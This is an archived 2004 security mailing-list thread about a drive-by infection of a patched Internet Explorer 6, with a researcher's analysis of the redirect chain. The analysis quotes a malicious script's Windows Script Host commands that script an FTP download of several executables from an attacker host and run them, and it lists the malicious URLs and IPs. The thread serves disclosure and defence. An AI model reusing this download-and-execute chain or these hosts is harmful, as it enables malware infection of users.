RE: Still Vulnerable in MSIE

["Kujawa, Greg" <Greg.Kujawa () DiamondCellar com>]

I don't see why this thread had to take a bitter personal turn, but anyway:

O The only evidence I have to support my claim of being infected with some
presumably unpatched vulnerabilities is the fact that I update my company's
systems on a daily basis for antivirus definitions as well as Microsoft
security updates. If my MSIE 6 client was hit by an exploit it must've been
an unpatched one because I do update my systems on a daily basis.

O I'm not sure of Thor's motive, but slanting it "a lot of FUD" is a bit
one-sided. I have read of dozens of unpatched IE exploits between Microsoft
security updates. This has been the case for years now. Since Microsoft only
releases updates on a monthly basis now do you really think that malicious
parties sit and wait for reading a proof of concept before exploiting
something? Perhaps the script kiddies that make some Mickey Mouse variant of
a well-known vulnerability, but there are others who are a bit more shrewd.
And Thor gave specific examples which makes his point even clearer. If he
mentions his own company's product in the message, big deal. At least he is
providing facts to go along with his assertions.

O The fact that you didn't get hit when visiting this site yourself is (as
you said) because the pop-ups don't appear anymore. The site redirects and
hidden scripting were the root source of the infection. Take away that and
then you take away the infection. Don't think that just because you are
patched on all the latest and greatest revisions of everything you are
riding in a bulletproof car.



-----Original Message-----
From: Jelmer [mailto:jkuperus () planet nl] 
Sent: Saturday, May 15, 2004 4:19 PM
To: 'Thor Larholm'; 'Greg Kujawa'; bugtraq () securityfocus com;
full-disclosure () lists netsys com
Subject: RE: Still Vulnerable in MSIE



While that is undoubtedly an impressive collection of nastiness all of the
issues you have amassed none of these pages, affected my fully patches IE6
nor should they since they have been patched quite some time ago as you are
probably well aware.

Yet somehow after composing a list of all these old and patched
vulnerabilities this site exploited, you manage to reach the astounding
conclusion that it uses several remaining unpatched vulnerabilities.

Can you present evidence to support that claim?

To me it sound like a lot of FUD spread by a company that has much to gain
from spreading it. That said the site in question now no longer presents
these popups so there might have been stuff going on that Thor didn't write
up. 


-----Original Message-----
From: Thor Larholm [mailto:thor () pivx com] 
Sent: zaterdag 15 mei 2004 0:45
To: Greg Kujawa; bugtraq () securityfocus com
Subject: RE: Still Vulnerable in MSIE

Nothing new here, it's just one of the remaining IE vulnerabilities that are
not yet patched. If I dare allow a small product pitch, the publicly
available version of Qwik-Fix ( http://qwik-fix.net ) has protected against
threats such as this for more than half a year now, without requiring any
signature updates (since there are no need for signatures).

This is not the first time that spyware has mixed with vulnerabilities,
exploits and worms. Spyware is increasingly becoming a corporate liability,
Robert Mitchell recently did a feature story on this at
http://www.computerworld.com/securitytopics/security/story/0,10801,92784
,00.html

The high of IE vulnerabilities on my Unpatched list was 32, right now we are
at about 12 that still have no patches. There's continuously new research
being posted to the Unpatched mailing list ( http://unpatched.pivxlabs.com )
on topics such as this spyware/worm threat.

Anyway, back to hnc3k.com - there is obviously a lot happening on all of
these popups, and quite a number of IE exploits are being exploited. A hint
of caution, don't go to any of these pages without Qwik-Fix on your machine,
they contain malicious code which will execute on your system if it does not
have adequate protection. Another hint of caution, don't panic if your AV
labels this email as being naughty just because I mention specific dirty
words.

One of the pages that try to exploit IE vulnerabilities is at

http://65.17.207.40/framepb_1u.php

which redirects to

http://si1.default-homepage-network.com/180/180.htm?si-001

which redirects to

http://object.passthison.com/vu083003/object.cgi?si1

which uses the Object Data vulnerability to change your startpage to

http://default-homepage-network.com/start.cgi?hkcu

the parameter at the end is either HKCU or HKLM depending on what registry
branch lead you there. This serves to notify default-homepage-network
whether your machine has been compromised with user or administrator
privileges

start.cgi also opens a few popup windows with advertisements, after which it
opens the following page 

http://default-homepage-network.com/newspynotice.html

that wants to sell you a cure against spyware which hijacks your start page
- as theirs just did.

That page also secretly opens

http://object.passthison.com/vu083003/newobject1.cgi
http://69.50.139.61/hp1/hp1.htm http://www.achtungachtung.com/0021/index.php

newobject1.cgi executes the following commands through the Windows Script
Host object:

wsh.Run('command /C echo open
downloads.default-homepage-network.com>o',false,6);
wsh.Run('command /C echo tmpacct>>o',false,6);
wsh.Run('command /C echo 12345>>o',false,6);
wsh.Run('command /C echo bin>>o',false,6);
wsh.Run('command /C echo get install2.exe>>o',false,6); wsh.Run('command /C
echo get infamous_downloader.exe>>o',false,6);
wsh.Run('command /C echo get 0021-bdl94126.EXE>>o',false,6);
wsh.Run('command /C echo get CS4P028.exe>>o',false,6); wsh.Run('command /C
echo bye>>o',false,6); wsh.Run('command /C echo if not exist
%windir%\statuslog ftp -s:o
> o.bat',false,6);
wsh.Run('command /C echo if exist install2.exe install2.exe
> > o.bat',false,6);
wsh.Run('command /C echo if exist infamous_downloader.exe
infamous_downloader.exe >>o.bat',false,6); wsh.Run('command /C echo if exist
0021-bdl94126.EXE 0021-bdl94126.EXE
> > o.bat',false,6);
wsh.Run('command /C echo if exist CS4P028.exe CS4P028.exe
> > o.bat',false,6);
wsh.Run('command /C o.bat',false,6);

Hp1.htm tries to exploit the Ibiza MHTML/CHM vulnerability to launch
http://69.50.139.61/hp1/HP1.chm::/hp1.htm

framepb_1u.php also tries to open http://69.50.139.61/hp2/hp2.htm which uses
Ibiza to launch http://69.50.139.61/hp2/hp2.chm::/hp2.htm

Other files that are attempted to be delivered are

http://www.addictivetechnologies.net/DM0/cab/emCraft1.cab
http://www.addictivetechnologies.net/DM0/exe/emCraft1.exe
http://validation-required.info/ http://www.popmoney.net/ip/index.php
http://www.portalone.hostance.com.com/italia.exe





Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
thor () pivx com
Stock symbol: (PIVX)
Phone: +1 (949) 231-8496
PGP: 0x5A276569
6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569

PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. 
<http://www.pivx.com/qwikfix>


-----Original Message-----
From: Greg Kujawa [mailto:greg.kujawa () diamondcellar com] 
Sent: Friday, May 14, 2004 7:37 AM
To: bugtraq () securityfocus com
Subject: Still Vulnerable in MSIE




With the latest vendor AV definitions and all of the Microsoft Security
Updates my MSIE 6 application still was vulnerable to some apparent
cross-site scripting exploit. I was hit with one of the many Agobot variants
when exiting a site detailing some IE vulnerabilities
(http://www.hnc3k.com). The site exit led to a series of pop-up and
pop-under ads. 



All of these site redirects apparently resulted in a www2.flingstone.com
site dropping in a infamous.exe file onto my computer. All the while I saw
no prompts to download or execute anything whatsoever. All I did was close
the windows that were coming up.



Just an FYI since even the latest updates on all fronts cannot ensure peace
of mind.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html